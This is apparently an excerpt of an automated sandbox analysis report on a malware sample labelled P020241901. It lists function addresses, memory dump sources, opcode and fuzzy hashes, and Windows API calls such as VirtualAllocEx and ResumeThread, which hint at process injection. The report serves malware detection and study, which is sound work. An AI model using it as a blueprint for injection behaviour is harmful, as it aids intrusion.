                                  • Opcode ID: fcabf2ce574a3bdd0530650a12bbcb687c9be44a45ea9d8aa2e588b607fc7827
                                  • Instruction ID: 52ce32c958bbc0f67afcba6e5ac9a6ae067fffc48ad2d5e08abe3d971222c389
                                  • Opcode Fuzzy Hash: fcabf2ce574a3bdd0530650a12bbcb687c9be44a45ea9d8aa2e588b607fc7827
                                  • Instruction Fuzzy Hash: C01123B68003499FDB20DFAAC444BEEFBF4EF48314F14842AD529A7210C379A585CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED4988 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06ED49F6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 369a4b94666e7775b96cd3125741ab191b166a23854f431f85ed112197e2dc3d
                                  • Instruction ID: e341dd04052a86c625ffacdd11b83a8c6ac0e886a93d57deca2811c8970cfe62
                                  • Opcode Fuzzy Hash: 369a4b94666e7775b96cd3125741ab191b166a23854f431f85ed112197e2dc3d
                                  • Instruction Fuzzy Hash: 3D1137718002499FCB10DFAAC845AEFBFF5EF48320F108419E519A7250C779A540CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED47FE Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: e9714687056a14facf718eca0c436251a6d04c2c95d47e352d045dca7addd1f7
                                  • Instruction ID: e737d4b729f20ffeb0d4a43c31fb6f82aefabd7b6434ecdc989022d0e2d3eae5
                                  • Opcode Fuzzy Hash: e9714687056a14facf718eca0c436251a6d04c2c95d47e352d045dca7addd1f7
                                  • Instruction Fuzzy Hash: 301128B1D003488EDB20DFAAD4457AEBBF5EF98314F208419D519A7250C779A545CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED4800 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 956ccb84bb7e501133cf8d2003a628bce9ab767425f79443f211b975e25ae852
                                  • Instruction ID: 08edb103e67b57f1ab6be88bad715e025eec2da5d5014cb57c8593d866a30d28
                                  • Opcode Fuzzy Hash: 956ccb84bb7e501133cf8d2003a628bce9ab767425f79443f211b975e25ae852
                                  • Instruction Fuzzy Hash: 97113AB1D003488FCB10DFAAC4457AFFBF5EF88724F108419D519A7240CB79A544CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED71DC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ED8EAD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 2c0e06691f5f456d2eaebba685abef1aaedd11ecf192f418a96d6fb7dec462e8
                                  • Instruction ID: 87e57f8e337c81eaafcd1677125fe1127be6fdfec57ff70ce449f375c097059c
                                  • Opcode Fuzzy Hash: 2c0e06691f5f456d2eaebba685abef1aaedd11ecf192f418a96d6fb7dec462e8
                                  • Instruction Fuzzy Hash: 1C1103B58003489FDB10DF9AC845BEFFBF8EB48714F10845AE919A7201C379A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0097B060 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0097B0C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 67f05dff4816bcea6821eb4bab75b43f32fbc1a06d106579fd0a16f2b15e7e61
                                  • Instruction ID: ccc85dbc1819f196d0c79d2a5735bd49fdaedd24fa178485129166bef9a303f1
                                  • Opcode Fuzzy Hash: 67f05dff4816bcea6821eb4bab75b43f32fbc1a06d106579fd0a16f2b15e7e61
                                  • Instruction Fuzzy Hash: B811FDB68003498ECB20DF9AC444B9EFBF8EF89310F10841AD429A7204C379A545CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED8E48 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ED8EAD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 951c6f08fcb5c49791a2bdc6d17a5c2de9ae72ed62038c09d014057d0af69d6b
                                  • Instruction ID: 54a6867da39f0d613e6160e4e956ed6ed2c174c7bcdc8b729116aab65e2a01d4
                                  • Opcode Fuzzy Hash: 951c6f08fcb5c49791a2bdc6d17a5c2de9ae72ed62038c09d014057d0af69d6b
                                  • Instruction Fuzzy Hash: E711F2B58003489FDB10DF9AD885BEEFBF4EB48324F20855AD529A3250C379A584CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006DD3D8 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000131399.00000000006DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006DD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6dd000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37ec84c03e39ddce7d0135809ec33a9a1d42ecb1f1e2d04bc6882998ddedc12e
                                  • Instruction ID: dcf83bc01fa2ec258c37db2cf1696315cea90daac35c2e7c56f525456169da3c
                                  • Opcode Fuzzy Hash: 37ec84c03e39ddce7d0135809ec33a9a1d42ecb1f1e2d04bc6882998ddedc12e
                                  • Instruction Fuzzy Hash: 2C212871900204DFDB15EF14D9C0F2ABFA6FB98324F20C56AD9090B356C33AE856D7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006ED01C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000191743.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bea7c158f7f582285efac7b06ee94ae932c155c4f5c3e17e31032907b40bf4f6
                                  • Instruction ID: 8f0285f8c14545185f4171bf59f36bf48666be56e6ca4f4af082c8e35dc3f26c
                                  • Opcode Fuzzy Hash: bea7c158f7f582285efac7b06ee94ae932c155c4f5c3e17e31032907b40bf4f6
                                  • Instruction Fuzzy Hash: 5F21F271604384DFCB14DF24D984B26BF66FB88314F28C569D90A4B396C33AD847CA61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006ED1D4 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000191743.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eac55fb3b2c3704db3a0bbfda7b08e9dd33d9df70607daa955728c28622f7246
                                  • Instruction ID: d60a54644295da60f1b8031e5c843f2007e8c771a7d8757865f96482e19e5d8e
                                  • Opcode Fuzzy Hash: eac55fb3b2c3704db3a0bbfda7b08e9dd33d9df70607daa955728c28622f7246
                                  • Instruction Fuzzy Hash: 7721F275504384EFDB05DF25D9C0B26BBA6FB88314F20C56DEA094B396C33AD906DA61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006ED006 Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000191743.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f88f01c4b497c881a0cd02fec18b43ba0618b4e2f6530f7b52039d7fc6752a76
                                  • Instruction ID: 5eae2cde66a5f1fb4769d769ff5e4d63511e2e9e341d2843fb3a69b56bd30247
                                  • Opcode Fuzzy Hash: f88f01c4b497c881a0cd02fec18b43ba0618b4e2f6530f7b52039d7fc6752a76
                                  • Instruction Fuzzy Hash: 33215E755093C08FDB12CF24D994755BF72EB46314F28C5EAD8498F6A7C33A980ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006DD3D3 Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000131399.00000000006DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006DD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6dd000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction ID: fd0aa97e85632751e59951922ad1736295ac342e2093bfe2e9f5b062cbd2ae13
                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction Fuzzy Hash: 68112972804240DFCB12DF00D5C4B56BFB2FB94324F24C6AAD9090B356C33AE456CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006ED1CF Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000191743.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction ID: bf25036823362e7365348875fbd4585e5948ea58054212d7b2ebbc135ef9710f
                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction Fuzzy Hash: F511BB75504380DFCB02CF10C5C4B15BBA2FB84314F24C6A9DA494B396C33AD80ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006DD745 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000131399.00000000006DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006DD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6dd000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 07f68d0b977331d30f12656b5f71d54f3f8f64b1aa1a5b45777bcbaeb4f48a77
                                  • Instruction ID: eba5bad6c494ab9d7a17cb448703d36c0105c682dfed9610244b4ae4005acbd5
                                  • Opcode Fuzzy Hash: 07f68d0b977331d30f12656b5f71d54f3f8f64b1aa1a5b45777bcbaeb4f48a77
                                  • Instruction Fuzzy Hash: FA01DB71904344AAE720AF25CD84B67BF9DEF56324F18C5ABED090B386D2799841CAB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 006DD744 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000131399.00000000006DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006DD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6dd000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5770246ab56dd3af1b67b5578d483dc7331527485455897e35039ec5daf17520
                                  • Instruction ID: 1e45e1a9928ff8ff86ec767ed090d88b1e5aca0b0ee73cb11ae219414ae9327d
                                  • Opcode Fuzzy Hash: 5770246ab56dd3af1b67b5578d483dc7331527485455897e35039ec5daf17520
                                  • Instruction Fuzzy Hash: 30F06271804344AAE7209E16C888BA2FF98EF56734F18C45BED4C4B386C2799844CAB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 04A90040 Relevance: .3, Instructions: 315COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2012790551.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4a90000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: efa1a1c1a7b3d15b687752fd7afb1129743e468e564d25ec086877ad566c42e6
                                  • Instruction ID: 8ff5513c61bdf6cc02f2c90ce1e841801704abe2aa3a48f943c2c64fc09bc7ea
                                  • Opcode Fuzzy Hash: efa1a1c1a7b3d15b687752fd7afb1129743e468e564d25ec086877ad566c42e6
                                  • Instruction Fuzzy Hash: 7A12B8F2C817658BE319CF25E94C1A93BB1BB41314BD08A09D1E16F2E6D7B4916ECF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED3FD8 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 211c39c37c05e704b1ea4a36aade9b87b3ecd446189931fb593c68b6166aedb5
                                  • Instruction ID: 945576d25618ad7e2ebadb18b326bb1ae3d5bb8fa496f2efbf68a7bfc2f14b9b
                                  • Opcode Fuzzy Hash: 211c39c37c05e704b1ea4a36aade9b87b3ecd446189931fb593c68b6166aedb5
                                  • Instruction Fuzzy Hash: 95E1E774E10219CFDB14DFA9C580AAEFBF2BF89305F249169D414AB356D730A942CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED3768 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c58e88c623a29c41c6a313a39c105b9a39f6394b772ed42ad8dcb15a8a0c18a0
                                  • Instruction ID: 4ed326986abf8165ff2b02c759b0cb44bf404be0c3c9b845198b97c0660334fe
                                  • Opcode Fuzzy Hash: c58e88c623a29c41c6a313a39c105b9a39f6394b772ed42ad8dcb15a8a0c18a0
                                  • Instruction Fuzzy Hash: D5E11D74E002198FDB14DFA9C580AAEFBB2FF89305F249169D404AB359D730AD42CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED1C88 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c778c60e7816469f1a35ecad15362c3e31d1635fd45ca8ebf078020221055913
                                  • Instruction ID: 156ee6746b676bf5154697f5a7433f9b25cb2273cc68f7d1bfe4fb8c46c58f3b
                                  • Opcode Fuzzy Hash: c778c60e7816469f1a35ecad15362c3e31d1635fd45ca8ebf078020221055913
                                  • Instruction Fuzzy Hash: 5EE12B74E102198FDB14DFA9C580AAEFBF2FF88305F249169D404AB356D731A942CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED3BA0 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bbeb480c42477013b0c7e48f2a6f760d884523598d549cfe9be8f46e4e2bf5de
                                  • Instruction ID: 77fac6e0a502d6e3b5276b8fa9ad79864bdf3fffe1a83850211d5054c81f35f4
                                  • Opcode Fuzzy Hash: bbeb480c42477013b0c7e48f2a6f760d884523598d549cfe9be8f46e4e2bf5de
                                  • Instruction Fuzzy Hash: 93E12A74E102198FDB14DFA9C580AAEFBB2FF89305F249169D414AB356D730AD42CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED20C0 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8083d2561d5cfcac694c71da3efc1a617d0d793fb821280c3f456d2b94ef71f2
                                  • Instruction ID: cd1004c4935addff263c63bd179acf4516a2c3efc8624dab186f152261c96ff4
                                  • Opcode Fuzzy Hash: 8083d2561d5cfcac694c71da3efc1a617d0d793fb821280c3f456d2b94ef71f2
                                  • Instruction Fuzzy Hash: 9FE13B74E102198FDB14DFA9C5809AEFBF2FF89305F249169D514AB316D731AA42CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0097DCB4 Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 200544280135e21c94a6994e623ca27092e96a954cbd2c4fdedaa05cce77de3e
                                  • Instruction ID: c04697bce2b7bf10a468c9872ad131c81a93e7ae626fc02922e520f14aa20766
                                  • Opcode Fuzzy Hash: 200544280135e21c94a6994e623ca27092e96a954cbd2c4fdedaa05cce77de3e
                                  • Instruction Fuzzy Hash: B6A17C32E006158FCF19DFB4C8445AEB7B6FF85300B15857AE819BB266DB31E916CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04A90006 Relevance: .2, Instructions: 232COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2012790551.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4a90000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f16fb8c738b84faab5394b1e643fd6f45bb9889f0c241683d8cf271bc14f742d
                                  • Instruction ID: 8b47d595fca3e0f599fd6126d66f62c655558704f13de104bdae5e2d78de05a3
                                  • Opcode Fuzzy Hash: f16fb8c738b84faab5394b1e643fd6f45bb9889f0c241683d8cf271bc14f742d
                                  • Instruction Fuzzy Hash: C1C15FB1C817658FD719CF25E94C1A93BB1BB85314F908A09D1A16F2E2DBB4906ECF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED20B0 Relevance: .1, Instructions: 131COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1539fb1183cb6a43681823d0a6d8dad6cdc465602d98e497f1ef69d3c509b005
                                  • Instruction ID: 373bd2422ac298fd5883f4d38d4aa49cf6d194f365bc8c3af4f835dfc5f0b636
                                  • Opcode Fuzzy Hash: 1539fb1183cb6a43681823d0a6d8dad6cdc465602d98e497f1ef69d3c509b005
                                  • Instruction Fuzzy Hash: B0512D70E102198FDB14CFA9C5809AEFBF2BF89305F24D169D518AB316D7319A46CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06ED85E7 Relevance: .0, Instructions: 18COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9cd476549cdf03d33eb9773e4693c61f5bcad0ea259827911da68de24662a09e
                                  • Instruction ID: 7d81ce9d457f6fc768f379239e996a190c7ab1efd25fbe921070e42eba99b1e1
                                  • Opcode Fuzzy Hash: 9cd476549cdf03d33eb9773e4693c61f5bcad0ea259827911da68de24662a09e
                                  • Instruction Fuzzy Hash: 7BC08025E8F348CFD74049C864084F5F37CDB87126F443073C50FE3306D220401581A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:13.2%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:25
                                  Total number of Limit Nodes:6
                                  execution_graph 27711 2800848 27713 280084e 27711->27713 27712 280091b 27713->27712 27715 2801382 27713->27715 27717 2801396 27715->27717 27716 2801484 27716->27713 27717->27716 27719 2807090 27717->27719 27720 280709a 27719->27720 27721 28070b4 27720->27721 27725 5ccd388 27720->27725 27730 5ccd383 27720->27730 27735 5ccd379 27720->27735 27721->27717 27726 5ccd39d 27725->27726 27727 5ccd5b2 27726->27727 27728 5ccd5d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27726->27728 27729 5ccd5d3 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27726->27729 27727->27721 27728->27726 27729->27726 27732 5ccd388 27730->27732 27731 5ccd5b2 27731->27721 27732->27731 27733 5ccd5d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27732->27733 27734 5ccd5d3 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27732->27734 27733->27732 27734->27732 27736 5ccd382 27735->27736 27738 5ccd39d 27735->27738 27736->27721 27737 5ccd5b2 27737->27721 27738->27737 27739 5ccd5d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27738->27739 27740 5ccd5d3 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27738->27740 27739->27738 27740->27738

                                  Executed Functions

                                  Function 02809B30 Relevance: 3.1, Instructions: 3097COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a14991ca884a1f9f16a76d0b8ab95f055b1cd61bf80e63a5c5cc05d4f2257663
                                  • Instruction ID: be58183e2facaeddae00cc43730d386b5be9fd9e94aa4dc6cd00880928ac7869
                                  • Opcode Fuzzy Hash: a14991ca884a1f9f16a76d0b8ab95f055b1cd61bf80e63a5c5cc05d4f2257663
                                  • Instruction Fuzzy Hash: 2B632D35D10B198ACB11EF68C8946A9F7B1FF99300F51C79AE458B7121EB70AAD4CF81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0280CE88 Relevance: 2.3, Instructions: 2304COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52eecf0210a30edeaecedf524db764654cd8a4460373482d908710129e35452e
                                  • Instruction ID: f037cf93439cb0147d218747557fc5d7eac6d4af9fc1743ae07e809acd20035c
                                  • Opcode Fuzzy Hash: 52eecf0210a30edeaecedf524db764654cd8a4460373482d908710129e35452e
                                  • Instruction Fuzzy Hash: 14332D35D107198ECB11EF68C8906ADF7B1FF99300F15C79AE448A7265EB70AAC5CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02809378 Relevance: .6, Instructions: 616COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8ec6711925f002634c87e7383377cacf9e2d3816145a61493735566ab414b630
                                  • Instruction ID: efb10011894e3bc661da121da9bfe278dfe8afd3fdc1b12cf972e74af73f2574
                                  • Opcode Fuzzy Hash: 8ec6711925f002634c87e7383377cacf9e2d3816145a61493735566ab414b630
                                  • Instruction Fuzzy Hash: C232A278A002058FDB54DFA8D984BADBBB6FF88710F248469E409DB3A6DB35DC41CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02804A98 Relevance: .3, Instructions: 266COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_2800000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ebaf8c52281ff70039c3bb8ce1eb3a4f2e1c8a5880328462ec01472056648e22
                                  • Instruction ID: 118eb7fd7aaa29b68020c7a40f8b2026e27df046163457275531d73e8a499d2d
                                  • Opcode Fuzzy Hash: ebaf8c52281ff70039c3bb8ce1eb3a4f2e1c8a5880328462ec01472056648e22
                                  • Instruction Fuzzy Hash: 52B17C78E402098FDB50CFA9CDD17ADBBF2AF88314F148129D919E7294EB749885CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02803E80 Relevance: .2, Instructions: 238COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3233381056.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                  Joe Sandbox IDA Plugin
